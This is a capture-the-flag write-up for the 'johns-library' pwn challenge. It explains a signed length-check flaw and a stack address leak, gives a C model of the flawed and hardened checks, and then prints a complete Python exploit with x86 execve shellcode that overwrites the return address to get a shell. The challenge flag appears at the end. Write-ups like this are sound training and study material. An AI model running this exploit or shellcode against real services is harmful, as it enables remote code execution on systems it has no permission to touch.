johns-library

Abstract

Category: pwn
Points: 150

Welcome to the jungle library mate! Try to escape!!

 r - read from library
 a - add element
 u - exit
a
Hey mate! Insert how long is the book title:
1
apple

 r - read from library
 a - add element
 u - exit
r
Insert the index of the book you want to read: 0
apple

There are three options:

 r - read from library
 a - add element
 u - exit
  • r - read from library: reads an index number and returns the buffer at that index, len[input] bytes of it
  • a - add element: appends an element to the buffer after checking that the previous length plus the input length is not greater than 1024; otherwise exit(-1)
  • u - exit: returns

Details

The main point is to expose a stack address.
Due to the string constraints we cannot directly expose the saved ebp on the stack;
we can only expose an address stored at esp (when a function is called the program puts the argument on the stack at esp, so we learn the buffer address).
After exposing the buffer address, we overwrite the return address with the buffer address and exit,
so our shellcode executes and we can read the flag:

$ cat /home/ctf/flag
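As an added example (not the challenge binary and not the author's code), the C below models the two checks this write-up describes: the 1024-byte length sum check in its signed form, which a request of -28 passes, beside a hardened form, plus an index-checked read. The struct layout, MAX_BOOKS and the per-title malloc storage are assumptions.

```c
/* Added model of the library's checks (assumed layout); not the challenge binary. */
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

#define POOL_SIZE 1024 /* title budget from the write-up */
#define MAX_BOOKS 16   /* assumed */

struct library {
    size_t count;            /* books stored */
    size_t used;             /* title bytes charged against POOL_SIZE */
    char *titles[MAX_BOOKS];
};

/* The check as the write-up describes it: previous length plus request must
 * not exceed 1024. Evaluated on signed ints, a request of -28 passes. */
bool weak_length_ok(int used, int requested) {
    return used + requested <= POOL_SIZE;
}

/* Hardened form: reject non-positive requests before any arithmetic, then
 * compare against the remaining budget by subtraction so nothing can wrap. */
bool safe_length_ok(size_t used, long requested) {
    if (requested <= 0 || used > POOL_SIZE) return false;
    return (size_t)requested <= POOL_SIZE - used;
}

/* Add a title of `requested` bytes; returns its index, or -1 when rejected. */
int add_book(struct library *lib, long requested, const char *title) {
    if (lib->count >= MAX_BOOKS || !safe_length_ok(lib->used, requested)) return -1;
    size_t n = (size_t)requested;
    char *copy = malloc(n + 1);
    if (!copy) return -1;
    strncpy(copy, title, n); /* never more than the budgeted bytes */
    copy[n] = '\0';
    lib->titles[lib->count] = copy;
    lib->used += n;
    return (int)lib->count++;
}

/* Read a title; a negative or out-of-range index yields NULL rather than
 * whatever sits next to the array in memory. */
const char *read_book(const struct library *lib, long idx) {
    if (idx < 0 || (size_t)idx >= lib->count) return NULL;
    return lib->titles[idx];
}
```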

Exploit

# Python 2 exploit script (print statements and str.encode('hex') are Python 2 only)
from socket import *
import telnetlib

ip = "library.polictf.it"
port = 80
soc = socket(AF_INET,SOCK_STREAM)
soc.connect((ip,port))

# 23-byte x86 execve("/bin//sh") shellcode
shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# banner and menu
recvbuff=soc.recv(4096)
print recvbuff
recvbuff=soc.recv(4096)
print recvbuff

# 'a' - add element with length -28 and a short title
payload = "a"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

payload = "-28 "
print payload
soc.send(payload)

payload = "a"*10+"\n"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

# 'r' - read index 1: the first 4 bytes of the reply are the leaked buffer (stack) address
payload = "r"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

payload = "1\n"
print payload
soc.send(payload)

recvbuff=soc.recv(4096)
print recvbuff
address= recvbuff[0:4]
print recvbuff[0:4].encode('hex')
recvbuff=soc.recv(4096)
print recvbuff

# 'a' - add the final element: NOP sled + shellcode + padding, then the leaked
# buffer address repeated so that it overwrites the saved return address
payload = "a"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

payload = "1\n"
print payload
soc.send(payload)

payload = "\x90"*900+shellcode+"a"*7+"a"*130
payload +=address*3+"\n"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

# hand the socket over for interactive use; the exit option ('u') returns into the buffer
t = telnetlib.Telnet()
t.sock = soc
t.interact()

Flag

flag{John_should_read_a_real_book_on_s3cur3_pr0gr4mm1ng}